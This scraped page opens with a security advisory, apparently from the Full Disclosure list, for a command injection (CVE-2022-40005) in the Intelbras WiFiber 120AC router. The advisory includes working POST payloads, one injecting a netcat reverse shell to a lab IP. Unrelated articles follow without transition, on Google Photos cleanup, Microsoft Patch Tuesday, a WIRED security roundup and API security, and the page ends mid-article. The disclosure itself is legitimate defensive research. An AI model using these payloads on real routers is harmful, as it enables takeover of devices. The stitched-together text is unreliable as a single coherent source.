Intelbras WiFiber 120AC inMesh before 1-1-220826 allows command injection by authenticated users, as demonstrated by the /boaform/formPing6 and /boaform/formTracert URIs for ping and traceroute.

**Full Disclosure mailing list archives****Re: CyberDanube Security Research 20221009-0 | Authenticated Command Injection in Intelbras WiFiber 120AC inMesh**

_From_: Thomas Weber <t.weber () cyberdanube com>  
_Date_: Tue, 13 Dec 2022 17:59:41 +0100  

CyberDanube Security Research 20221009-0

\-------------------------------------------------------------------------------

               title| Authenticated Command Injection
             product| Intelbras WiFiber 120AC inMesh
  vulnerable version| 1.1-220216
       fixed version| 1-1-220826
          CVE number| CVE-2022-40005
              impact| High
            homepage| https://www.intelbras.com
               found| 2022-08-01
                  by| T. Weber (Office Vienna)
                    | CyberDanube Security Research
                    | Vienna | St. Pölten
                    |
                    | https://www.cyberdanube.com

\-------------------------------------------------------------------------------

Vendor description

\-------------------------------------------------------------------------------

"We are Intelbras. A company that for 45 years has been offering innovative

solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an

INspiration and a promising idea: to manufacture PABX centrals. During the

80's, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s

were marked by the consolidation of the company in the telecommunications

segment and we became leaders in the PABX and telephone terminals segment. The

turn of the millennium represented the search for greater connection and

proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing

units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.

We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our

DNA, increasingly present in our daily lives. And it was only possible to

write a story so full of achievements because employees, partners and customers

were close and believed in us."

Source: https://www.intelbras.com/en/institutional/who-we-are

Vulnerable versions

\-------------------------------------------------------------------------------

WiFiber 120AC inMesh / 1.1-220216


Vulnerability overview

\-------------------------------------------------------------------------------

1) Authenticated Command Injection (CVE-2022-40005)

The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, more extensive damage in the corresponding network can

be done by an attacker.


Proof of Concept

\-------------------------------------------------------------------------------

1) Authenticated Command Injection (CVE-2022-40005)
The web server is prone to an authenticated command injection via POST
parameters. The following proof-of-concept shows how to inject the command
"ls /" to the system which gets executed in the background:

\===============================================================================

POST /boaform/formPing6 HTTP/1.1
Host: 192.168.3.147

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/ping6.asp
Upgrade-Insecure-Requests: 1

pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 \===============================================================================

The following commands can be used to open a reverse shell:

"rm -f /tmp/f"
"mkfifo /tmp/f"
"cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"

Those commands were sent via a crafted POST request:

\===============================================================================

POST /boaform/formTracert HTTP/1.1
Host: 192.168.3.147

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/tracert.asp
Upgrade-Insecure-Requests: 1

proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 \===============================================================================

The vulnerability was manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).


Solution

\-------------------------------------------------------------------------------

Update to firmware version 1-1-220826.

https://backend.intelbras.com/sites/default/files/2022-08/ONT\_Wifiber\_120\_AC\_Vers%C3%A3o\_1-1-220826.zip

Workaround

\-------------------------------------------------------------------------------

None


Recommendation

\-------------------------------------------------------------------------------

CyberDanube recommends Intelbras customers to upgrade the firmware to the
latest version available.


Contact Timeline

\-------------------------------------------------------------------------------

2022-08-02: Contacting Intelbras via suporte () intelbras com br.
2022-08-03: Request from Intelbras to send the advisory to
csirt () intelbras com br; Sent the advisory to this address.
2022-08-30: Asked for status update; Vendor answered that the new firmware

            version has been released the day before. Set the disclosure date

            to 2022-10-03 (60 days policy).
2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
2022-10-09: Coordinated disclosure of advisory.


Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T. Weber / @2022

On 09.10.22 17:21, Thomas Weber wrote:

> CyberDanube Security Research 20221009-0
> 
> \-------------------------------------------------------------------------------
> 
>                title| Authenticated Command Injection
>              product| Intelbras WiFiber 120AC inMesh
>   vulnerable version| 1.1-220216
>        fixed version| 1-1-220826
>           CVE number|
>               impact| High
>             homepage| https://www.intelbras.com
>                found| 2022-08-01
>                   by| T. Weber (Office Vienna)
>                     | CyberDanube Security Research
>                     | Vienna | St. Pölten
>                     |
>                     | https://www.cyberdanube.com
> 
> \-------------------------------------------------------------------------------
> 
> Vendor description
> 
> \------------------------------------------------------------------------------- "We are Intelbras. A company that for 45 years has been offering innovative solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an INspiration and a promising idea: to manufacture PABX centrals. During the 80's, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s
> 
> were marked by the consolidation of the company in the telecommunications
> 
> segment and we became leaders in the PABX and telephone terminals segment. The
> 
> turn of the millennium represented the search for greater connection and
> 
> proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing
> 
> units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.
> 
> We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our
> 
> DNA, increasingly present in our daily lives. And it was only possible to
> 
> write a story so full of achievements because employees, partners and customers
> 
> were close and believed in us."
> 
> Source: https://www.intelbras.com/en/institutional/who-we-are
> 
> Vulnerable versions
> 
> \-------------------------------------------------------------------------------
> 
> WiFiber 120AC inMesh / 1.1-220216
> 
> 
> Vulnerability overview
> 
> \-------------------------------------------------------------------------------
> 
> 1) Authenticated Command Injection
> 
> The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, more extensive damage in the corresponding network can
> 
> be done by an attacker.
> 
> 
> Proof of Concept
> 
> \-------------------------------------------------------------------------------
> 
> 1) Authenticated Command Injection
> The web server is prone to an authenticated command injection via POST
> 
> parameters. The following proof-of-concept shows how to inject the command
> 
> "ls /" to the system which gets executed in the background:
> 
> \===============================================================================
> 
> POST /boaform/formPing6 HTTP/1.1
> Host: 192.168.3.147
> 
> User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
> 
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 87
> Origin: http://192.168.3.147
> Connection: close
> Referer: http://192.168.3.147/ping6.asp
> Upgrade-Insecure-Requests: 1
> 
> pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 \===============================================================================
> 
> The following commands can be used to open a reverse shell:
> 
> "rm -f /tmp/f"
> "mkfifo /tmp/f"
> "cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"
> 
> Those commands were sent via a crafted POST request:
> 
> \===============================================================================
> 
> POST /boaform/formTracert HTTP/1.1
> Host: 192.168.3.147
> 
> User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
> 
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 255
> Origin: http://192.168.3.147
> Connection: close
> Referer: http://192.168.3.147/tracert.asp
> Upgrade-Insecure-Requests: 1
> 
> proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 \===============================================================================
> 
> The vulnerability was manually verified on an emulated device by using the
> 
> MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
> 
> 
> Solution
> 
> \-------------------------------------------------------------------------------
> 
> Update to firmware version 1-1-220826.
> 
> https://backend.intelbras.com/sites/default/files/2022-08/ONT\_Wifiber\_120\_AC\_Vers%C3%A3o\_1-1-220826.zip
> 
> Workaround
> 
> \-------------------------------------------------------------------------------
> 
> None
> 
> 
> Recommendation
> 
> \-------------------------------------------------------------------------------
> 
> CyberDanube recommends Intelbras customers to upgrade the firmware to the
> latest version available.
> 
> 
> Contact Timeline
> 
> \-------------------------------------------------------------------------------
> 
> 2022-08-02: Contacting Intelbras via suporte () intelbras com br.
> 2022-08-03: Request from Intelbras to send the advisory to
> csirt () intelbras com br; Sent the advisory to this address.
> 
> 2022-08-30: Asked for status update; Vendor answered that the new firmware             version has been released the day before. Set the disclosure date
> 
>             to 2022-10-03 (60 days policy).
> 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
> 2022-10-09: Coordinated disclosure of advisory.
> 
> 
> Web: https://www.cyberdanube.com
> Twitter: https://twitter.com/cyberdanube
> Mail: research at cyberdanube dot com
> 
> EOF T. Weber / @2022

**Attachment: smime.p7s**  
_Description:_ S/MIME Cryptographic Signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Re: CyberDanube Security Research 20221009-0 | Authenticated Command Injection in Intelbras WiFiber 120AC inMesh** _Thomas Weber (Dec 13)_

CVE-2022-40005: Full Disclosure: Re: CyberDanube Security Research 20221009-0

Ever-expanding cloud storage presents more risks than you might think.

Every year, more than a billion people use the Google Photos app to upload and store billions of pictures and videos. For many, the process is likely identical: You snap some photos with your phone and they’re automatically uploaded to Google’s cloud service. You might pick the best photo and share it on WhatsApp or Instagram and then never think about the rest of them ever again. The photos join a constantly updating stream of data about life.

But it shouldn’t be this way. Uploading thousands of photos and never taking any steps to sort or manage them creates a series of privacy risks and is making it impossible to maintain your photo collection in the future. Now is the time to stop being an information hoarder, before it spirals out of control.

For the past six weeks, I’ve spent around a dozen hours deleting thousands of photos that had been uploaded to my Google Photos account in the last half-decade. In total, I erased 16,774 photos and videos. During the process—and thousands of "delete" taps—three things stood out: My photos collection unknowingly includes a lot of sensitive personal information (both about me and others); I don't need to keep so many photos; and wrestling my collection into shape frees up a lot of space in my Google account.

My photo archive goes back to the early 2000s when everything was captured using an eight-megapixel digital camera. There are tens of thousands of photos—it’s impossible to say how many exactly—and they are entirely handled by Google. The photos were initially stored on CDs, moved to Flickr before it limited collections to 1,000 images, and finally found their way onto Google Photos around 2018. When Google limited accounts to 15 gigabytes of storage, I started paying for more.

Inside the collection, family holiday shots sit alongside selfies. Food pictures and dog pictures are plentiful. As phone cameras have improved and cloud storage has become seemingly unending, it appears that I take more photos every year. I am not the only one. Google Photos holds an unfathomable amount of data about us all: In 2020, the company said it stores 4 trillion photos, with 28 billion new photos and videos uploaded each week.

Deleting thousands of photos was a manual, tedious process. Using an iPad, I scrolled through every photo I had backed up from the past 15-plus years and tapped each one that I wanted to send to trash. In one of the longer sessions, I erased 2,211 photos in 45 minutes. The majority of photos binned were duplicates: Instead of having 16 pictures of me running through a forest, only the best two or three remain. Thousands of screenshots were culled: The moment I was verified on Twitter and the news article about a goat being arrested didn’t make it through the process unscathed.

But beneath the surface, there were plenty of images that should never have been kept in the first place. For years, I had been keeping photos of passports—my own and those of friends who had sent me the details for booking trips. I found photos of the details needed to log in to my bank account. I was storing people’s addresses and screenshots of directions to their homes. The list goes on: private email addresses, NSFW photos, screenshots of embarrassing conversations, common running routes and travel directions, pictures of notebooks from sensitive meetings. Huge swaths of my life were stored in my photos. I didn’t know they were there or had forgotten about them as soon as they weren’t useful. 

Each of these presents a risk. While Google makes the vast majority of its profits from advertising—its privacy policy says it won’t show you personalized ads based on your photos—the company has a strong data security record. Successful hacks against the company are incredibly rare. However, each piece of data that you’re unnecessarily storing adds a little extra hazard if something does go wrong. Documents could be used to assist with identity theft, while other personal details could contribute to building up a picture of who you talk to, where you live, and the places you frequent. Aside from any potential data breaches, my photos could potentially be accessed if my phone is lost or stolen. (These issues aren’t unique to Google Photos; they equally apply to any online photo storage service.)

But there are other reasons to spend some time clearing up your photos. Ever-expanding cloud storage makes it possible to keep taking photos and adding to the pile. Once sorted, it has been easier to find specific events and the best photos from them. If I had waited another few years, the task would have been too daunting to even start. In another 10 years, I may have taken an extra 20,000 to 40,000 photos. Now I plan on sorting the most recent photos once a year. 

Plus, practically speaking, there’s now more space in my Google account. Before I started deleting everything, I’d used up around 80 GB of storage; I’ve decreased this to about 60 GB. Google has some tools to help you manage your photos. You can archive photos if you don’t want to delete them or keep them in your main photo library. And pictures can be siphoned off into albums (it was too late for me). Its storage management tools allow you to delete large photos and videos in bulk and get rid of screenshots and blurry photos. It’s also possible to free up some of your account’s space by shrinking the size of photos by dropping them to “storage saver quality.”

However, my obsession with organizing my digital life—including operating a strict WhatsApp Zero policy—means that I would be fully satisfied with the job only if I did it manually. As I sifted through the tens of thousands of photos I’ve taken during two-thirds of my life, there was a satisfying glow to the process—a nostalgia vortex. Once I was done, I started taking more photos.

Everyone Is Using Google Photos Wrong

Hello everyone! This episode will be about Microsoft Patch Tuesday for December 2022, including vulnerabilities that were added between November and December Patch Tuesdays. As usual, I use my open source Vulristics project to analyse and prioritize vulnerabilities. Alternative video link (for Russia): https://vk.com/video-149273431_456239112 But let’s start with an older vulnerability. This will be another example why […]

Hello everyone! This episode will be about Microsoft Patch Tuesday for December 2022, including vulnerabilities that were added between November and December Patch Tuesdays. As usual, I use my open source Vulristics project to analyse and prioritize vulnerabilities.

Alternative video link (for Russia): https://vk.com/video-149273431\_456239112

But let’s start with an older vulnerability. This will be another example why vulnerability prioritization is a tricky thing and you should patch everything. In the September Microsoft Patch Tuesday there was a vulnerability **Information Disclosure** – SPNEGO Extended Negotiation (NEGOEX) Security Mechanism (CVE-2022-37958), which was completely unnoticed by everyone. Not a single VM vendor paid attention to it in their reviews. I didn’t pay attention either.

**SPNEGO** **(Simple and Protected GSSAPI Negotiation Mechanism)** is a GSSAPI “pseudo mechanism” used by client-server software to negotiate the choice of security technology. SPNEGO is used when a client application wants to authenticate to a remote server, but neither end is sure what authentication protocols the other supports. Who knows what kind of disclosure there might be. This vulnerability had CVSS 7.5 (High), not even Critical.

And then on December 13th, IBM Security X-Force researcher Valentina Palmiotti posts a video exploiting this vulnerability, which turns out to be Remote Code Execution. In this video, a Python script is executed in a Linux virtual machine, and in a Windows 10 virtual machine, the message _“Your PC will automatically restart in one minute”_ appears, which indicates that some code was executed there. The researcher is famous and it is highly unlikely that the video is fake.

It turned out that the vulnerability can be exploited during the authentication attempts. The vulnerability affects various protocols. Primarily RDP and SMB. It may be relevant for SMTP, HTTP and others with a non-standard configuration. So, this vulnerability could potentially be worse than EternalBlue.

Microsoft has made changes to the description of the vulnerability. Now it is Critical RCE. NVD hasn’t made any changes yet. IBM promises not to release details until the second quarter of 2023 to give people time to patch.

Now let’s look at the most interesting vulnerabilities of Microsoft Patch Tuesday for December 2022.

    $ cat comments_links.txt 
    Qualys|December 2022 Patch Tuesday|https://blog.qualys.com/vulnerabilities-threat-research/patch-tuesday/2022/12/13/the-december-2022-patch-tuesday-security-update-review
    ZDI|THE DECEMBER 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/12/13/the-december-2022-security-update-review
    
    $ python3.8 process_classify_ms_products.py  # Automated classifier for Microsoft products
    
    $ python3.8 vulristics.py --report-type "ms_patch_tuesday_extended" --mspt-year 2022 --mspt-month "December" --mspt-comments-links-path "comments_links.txt"  --rewrite-flag "True"
    ...
    Creating Patch Tuesday profile...
    MS PT Year: 2022
    MS PT Month: December
    MS PT Date: 2022-12-13
    MS PT CVEs found: 49
    Ext MS PT Date from: 2022-11-09
    Ext MS PT Date to: 2022-12-12
    Ext MS PT CVEs found: 32
    ALL MS PT CVEs: 81
    ...

*   All vulnerabilities: 80
*   Urgent: 0
*   Critical: 3
*   High: 29
*   Medium: 48
*   Low: 0

There were 2 vulnerabilities with signs of exploitation in the wild:

1.  **Security Feature Bypass** – Windows SmartScreen (CVE-2022-44698). It is a bypass of the Windows SmartScreen security feature, and has been seen exploited in the wild. It allows attackers to craft documents that won’t get tagged with Microsoft’s “Mark of the Web” despite being downloaded from untrusted sites. Exploitation in the wild is mentioned on Vulners (cisa\_kev object), AttackerKB, Microsoft websites. The existence of a public exploit is mentioned in Microsoft CVSS Temporal Score (Functional Exploit). To be honest, I do not consider these warnings from the operating system to be effective. Therefore, this vulnerability does not seem very critical to me. I think an Antivirus or EDR solution should block suspicious files from running in the first place.
2.  **Memory Corruption** – Microsoft Edge (CVE-2022-4135, CVE-2022-4262). Exploitation in the wild is mentioned on Vulners (cisa\_kev object), AttackerKB websites. CVE-2022-4135: Heap buffer overflow in GPU in Google Chrome prior to 107.0.5304.121 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High). CVE-2022-4262: Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Among other vulnerabilities without public exploits and signs of exploitation in the wild, it makes sense to pay attention to the following:

1.  **Remote Code Execution** – Microsoft PowerShell (CVE-2022-41076). This critical vulnerability affects PowerShell where any authenticate user, regardless of its privilege could escape the PowerShell Remoting Session Configuration and run unapproved commands on the target system. It is worth mentioning that, typically after the initial breach, attackers use the tools available on the system to keep the preserve or advance around a network, and PowerShell is one of the more capable tools they can find. 
2.  **Remote Code Execution** – Windows Secure Socket Tunneling Protocol (SSTP) (CVE-2022-44670, CVE-2022-44676). This critical vulnerability affects Windows Secure Socket Tunneling Protocol (SSTP), and according to Microsoft, an attacker would need to win a race condition to successfully exploit these bugs. An unauthenticated attacker could send a specially crafted connection request to a RAS server, which could lead to remote code execution (RCE) on the RAS server machine. If you do not have this service, disable it. 
3.  Among the **Elevation of Privilege** vulnerabilities, I would like to highlight a vulnerability in DirectX Graphics Kernel (CVE-2022-44710) and Windows Print Spooler (CVE-2022-44678, CVE-2022-44681).

Full Vulristics report: ms\_patch\_tuesday\_december2022

Hi! My name is Alexander and I am a Vulnerability Management specialist. You can read more about me here. Currently, the best way to follow me is my Telegram channel @avleonovcom. I update it more often than this site. If you haven’t used Telegram yet, give it a try. It’s great. You can discuss my posts or ask questions at @avleonovchat.

А всех русскоязычных я приглашаю в ещё один телеграмм канал @avleonovrus, первым делом теперь пишу туда.

Microsoft Patch Tuesday December 2022: SPNEGO RCE, Mark of the Web Bypass, Edge Memory Corruptions

Plus: An offensive US hacking operation, swatters hacking Ring cameras, a Netflix password-sharing crackdown, and more.

We at WIRED are winding down for the year and gearing up for what is sure to be an eventful 2023. But 2022 isn’t going down without a fight. 

This week, following a new surge in mayhem at Twitter, we dove into exactly why the public needs real-time flight tracking, even if Elon Musk claims it’s the equivalent of doxing. The crucial transparency this publicly available data provides far outweighs the limited privacy value that censoring would give to the world’s rich and powerful. Unfortunately, Musk’s threats of legal action against the developer of the @ElonJet tracker are having broader chilling effects. 

Meanwhile, Iran’s internet blackouts—a response to widespread civil rights protests—are sabotaging the country’s economy, according to a new assessment from the US Department of State. Due to heavy sanctions on Iranian entities, the exact economic impact of Tehran’s internet blackouts is difficult to calculate. But experts agree it’s not good. 

You may have encountered the Flipper Zero in a recent viral TikTok video—but don’t believe everything you see. WIRED’s Dhruv Mehrotra got his hands on the palm-size device, which packs an array of antennas that allow you to copy and broadcast signals from all types of devices, like RFID chips, NFC cards, and more. We found that while the Flipper Zero can’t, say, make an ATM spill out money, it allows you to do plenty of other things that could get you into trouble. But mostly, it allows you to see the radio-wave-filled world around you like never before.

But that’s not all. Each week, we round up the security stories we didn’t cover in-depth ourselves. Click on the headlines to read the full stories. And stay safe out there. 

Between long hours, medallion costs, and the rise of Uber and Lyft, the life of a New York City cab driver is hard enough. Now it seems that Russian hackers—and a couple of their enterprising partners in Queens—were trying to get their own cut of those drivers’ fares.

According to prosecutors, two Queens men, Daniel Abayev and Peter Leyman, worked with Russian hackers to gain access to the taxi dispatch system for New York’s JFK airport. They then allegedly created a group chat where drivers could secretly pay $10 to skip the sometimes hours-long line to be assigned a pickup—about a fifth of the $52 flat fee passengers pay for rides from the airport to elsewhere in NYC. The indictment against the two men doesn’t name the Russians or detail exactly how they gained access to JFK’s dispatch system. But it notes that since 2019, Abayev and Leyman allegedly schemed to get access to the system by multiple methods, including bribing someone to insert a USB drive with malware into one of the dispatch operators’ computers, gaining unauthorized access to their systems via Wi-Fi, and stealing one of their tablet computers. “I know that the Pentagon is being hacked,” Abayev wrote to his Russian contacts in November 2019, according to the indictment. “So, can’t we hack the taxi industry\[?\]” 

Before the scheme was shut down, prosecutors say it was enabling as many as a thousand fraudulent line-skips a day for drivers, 

It’s hardly a secret that Cyber Command, the more cyberattack-focused sister organization to the NSA, is frequently engaged in “hunting forward,” as Cybercom director Paul Nakasone has described it. That means hacking foreign hackers preemptively to disrupt their operations, often in advance of an event like a US election. So perhaps it’s no surprise, as _The Washington Post_ reports, that Cybercom targeted Russian and Iranian hackers throughout the 2022 midterm elections. It’s not clear exactly how those hackers were disrupted, but one official told the _Post_ that the operations typically go after the basic tools the hackers use to operate, including their computers, internet connections, and malware. In some cases, that foreign malware is discovered by Cybercom abroad and shared with potential targets in the US to make it more easily detected. 

While foreign hacking of US elections has waned since its peak in 2016—when Russia hacked the Democratic National Committee, Clinton campaign, and many other targets—it has by no means disappeared. Cybersecurity firm Mandiant reported this week that the Russian military intelligence agency the GRU appears to have targeted election websites with distributed denial-of-service attacks during the midterm elections, despite Cyber Command’s efforts.

On Monday, federal prosecutors charged two men—one from Wisconsin, the other from North Carolina—for allegedly participating in a swatting scheme that, over a one-week span, targeted the owners of more than a dozen compromised Ring home security door cameras.  According to the indictment, Kya Christian Nelson, 21, and James Thomas Andrew McCarty, 20, used login credentials from leaked Yahoo accounts to access Ring accounts from individuals around the country. The defendants then allegedly phoned in false reports to law enforcement claiming to dispatchers that a violent incident was taking place at the victim’s house, and then they livestreamed the police response to the hoax. In several of the incidents, the two men taunted responding police officers and victims through the microphone of the Ring device, according to the indictment.

Nelson, who went by the alias “ChumLul,” is currently incarcerated in Kentucky in an unrelated case. McCarty, who went by the alias “Aspertaine,” was arrested last week on federal charges filed in the District of Arizona. Nelson and McCarty are both charged with conspiring to intentionally access computers without authorization. Nelson has also been charged with two counts of intentionally accessing a computer without authorization and two counts of aggravated identity theft. If convicted, they could each face up to five years in prison, with Nelson facing an additional seven years for the additional charges.

In March 2017, Netflix tweeted a simple message: “Love is sharing a password.” Now, five years later, that sentiment is coming to the end of its life. According to a _Wall Street Journal_ report this week, the streaming service plans to clamp down on password sharing in early 2023. Netflix has been testing ways to stop households in Latin America from sharing passwords throughout 2022, and the report suggests it is ready to expand the measures. Netflix says more than 100 million viewers watch its TV shows and movies using other people’s passwords, and it wants to convert those views into cash. “Make no mistake, I don’t think consumers are going to love it right out of the gate,” the _Journal_ reports Netflix co-CEO Ted Sarandos telling investors earlier this year. Elsewhere, the UK government’s Intellectual Property Office said it believes sharing passwords for online streaming services could breach copyright laws. It is unlikely anyone would ever be prosecuted, though.

The Roomba J7 home robot uses “PrecisionVision Navigation” to avoid objects in your home—such as piles of clothes on the floor or accidental piles of dog crap. The robot is partly able to do this using a built-in camera and computer vision. However, as _MIT Technology Review_ reported this week, gig economy workers in Venezuela posted photos from the robots online—including one image of a woman on the toilet. The photos and videos were captured by a development version of the J7 robot in 2020 and shared with a startup that contracts workers to label the images, helping to train computer vision systems. Those using the development machines had agreed for their data to be shared. Roomba maker iRobot, which is being purchased by Amazon, said it is ending its contract with the startup that leaked the images and is investigating what happened. However, the incident highlights some of the potential privacy risks with the vast data sets that are used to train artificial intelligence applications.

All Kelly Conlon wanted to do was watch the Rockettes with her daughter’s Girl Scout troop. But thanks to a face recognition system run by Madison Square Garden Entertainment, Conlon was summarily kicked out of Radio City Music Hall because she was unknowingly banned from the venue. The issue, according to MSG Entertainment, is that Conlon is an attorney at a law firm that’s currently engaged in litigation against the company. (Conlon said she is not personally involved in that litigation.) “They knew my name before I told them. They knew the firm I was associated with before I told them. And they told me I was not allowed to be there,” Conlon told NBC New York. MSG Entertainment, meanwhile, defended the attorney's expulsion as necessary to avoid an “inherently adverse environment.” The episode adds to concerns over the use of face-recognition tech, which remains so underregulated that a corporation can use it to punish its enemies. Happy holidays!

Russians Hacked JFK Airport Taxi Dispatch in Line-Skipping Scheme

APIs are key to cloud transformation, but two Google surveys find that cyberattacks targeting them are reaching a tipping point, even as general cloud security issues abound.

Web application programming interfaces (APIs) are the glue that holds together cloud applications and infrastructure, but these endpoints are increasingly under attack, with half of companies acknowledging an API-related security incident in the past 12 months.

According to a survey conducted by Google Cloud, the most troublesome security problems affecting companies' use of APIs are security misconfigurations, outdated APIs and components, and spam or abuse bots — with 40% of companies suffering an incident due to misconfiguration and a third coping with the latter two issues. 

Two-thirds of companies (67%) found API-related security issues and vulnerabilities during the testing phase, but most companies — greater than 60% — discovered issues during the software development process, during application deployment, and by using real-time monitoring, according to the survey of more than 500 technology leaders.

Despite these issues, more than three-quarters (77%) have confidence that they will catch issues, saying they have the required API tools and solutions, says Vikas Anand, head of product for business application platforms at Google Cloud.

"There's a perception of confidence with existing tooling that isn’t matched by evidence," Anand says. "The landscape for security has changed — with the dramatic growth in API volume, APIs are the new battleground for application security."

The interest in Web APIs comes as companies have accelerated their digital transformations over the past two years following the business disruptions caused by the coronavirus pandemic. Nearly all (93%) of companies surveyed by Google in a second study of 770 technology leaders characterized their operations as based on "mostly cloud," up from 83% two years ago. 

In contrast, business decision-makers characterizing their operations as "mostly on-premises" dropped by half to 7%, from 16%, in the same time period.

    

Source: Google Cloud

By one estimate, API-related security incidents caused $12 billion to $23 billion in losses since 2020. And the attack surface is getting bigger: The average large company has three times the number of APIs — 15,600 — as a year ago.

**APIs: Key to Cloud Transformation**

While 46% of organizations surveyed reserved their use of APIs to only within their own organization, more than half (54%) allow partners, customers, and other external developer use the APIs as a way to spur third-party development, Google found.

"APIs are critical to application modernization and digital transformation because, along with microservices, they enable rapid delivery of new experiences to customers, while cutting the cost of development and maintenance," Google Cloud stated in its _"_The Digital Crunch Time: 2022 State of APIs and Applications" report.

Because APIs are critical to their digital transformation, companies have wisely prioritized API security investments, with 60% aiming to improve their ability to proactively identify security threats, and 57% adopting more security automation and orchestration, according to Google Cloud's second report, "API Security: Latest Insights & Key Trends." 

About half of companies also intend to expand their real-time monitoring of API servers and using artificial intelligence and machine learning (AI/ML) systems to better discover flaws and detect attacks.

"As organizations move from being reactionary to proactively addressing these threats, we’ll see AI/ML models become more widely adopted within security tooling," Anand says. "ML-based rules are the natural evolution of this — not just automating, but continuously learning from those experiences."

**API Maturity Brings Cloud Success**

Unsurprisingly, companies that have had more experience with APIs have also found more success with their transition to more cloud-native operations.

About a third of companies (34%) classified themselves as having a mature approach to APIs, pushing an API-first strategy across the organizations and using an API management platform. Those companies also had more success increasing efficiency, better collaboration, and improved agility, compared with organizations with lower API maturity. 

Google Cloud defined low-maturity organizations as those with siloed APIs, no centralized management of APIs, and perhaps an API gateway for security.

"Our study shows that mature API organizations are considerably ahead in their digital transformation efforts compared to low-maturity API organizations," according to the vendor. "Technology leaders already understand the value that APIs bring."

For companies moving to API-based application infrastructure, API security is considered the most significant component of an API program, with 66% of companies considering it important, according to Google's report. Other top concerns included API performance analytics and API governance.

"API security ultimately needs to be part of the overall end-to-end security strategy," Anand says. "Seamless integrations between all security products make enhancing the overall security value from your portfolio easier."

Google: With Cloud Comes APIs & Security Headaches

With a recession potentially coming, some companies are cutting security teams. But moving more infrastructure to the cloud and reducing the number of vendors through consolidation may be the best ways to prepare.

As economic forecasters and businesses raise expectations of a recession in 2023, information-security budgets will likely be pressured in the coming year, experts tell Dark Reading.

